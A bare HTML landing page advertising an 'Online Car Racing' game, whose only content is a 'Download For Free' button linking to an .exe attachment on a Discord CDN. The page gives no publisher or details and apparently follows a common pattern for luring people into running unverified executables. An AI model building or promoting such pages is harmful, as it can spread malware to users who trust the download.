<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>online racing</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            margin: 0;
            padding: 0;
            
            background: url('1.png'); opacity:1;
            ;
            background-size: cover;
            color: white;
            text-align: center;
            background-color: black;

 
        }
        .container {
            position: relative;
            height: 100vh;
            display: flex;
            flex-direction: column;
            justify-content: center;
            align-items: center;
        }
        h1 {
            font-size: 4rem;
            margin-bottom: 20px;
        }
        .download-button {
            background-color: #1682e6; /* Button color */
            color: #ffffff;
            padding: 15px 30px;
            border: none;
            border-radius: 5px;
            cursor: pointer;
            font-size: 1.5rem;
            text-decoration: none;
        }
        .download-button:hover {
            background-color: #1471bd; /* Darker shade on hover */
        }
    </style>
</head>
<body>
    <div class="container">
        <h1>ONLINE CAR RACING</h1>
        <a href="https://cdn.discordapp.com/attachments/1136333384579293184/1328418176353964193/Online_Racing_Game.exe?ex=6786a156&is=67854fd6&hm=42f272e3136b7629c79e785d0b1c5a5c9e89a565a87d52415ef04a229649aa16&" class="download-button" download>Download For Free</a>
    </div>
</body>
</html>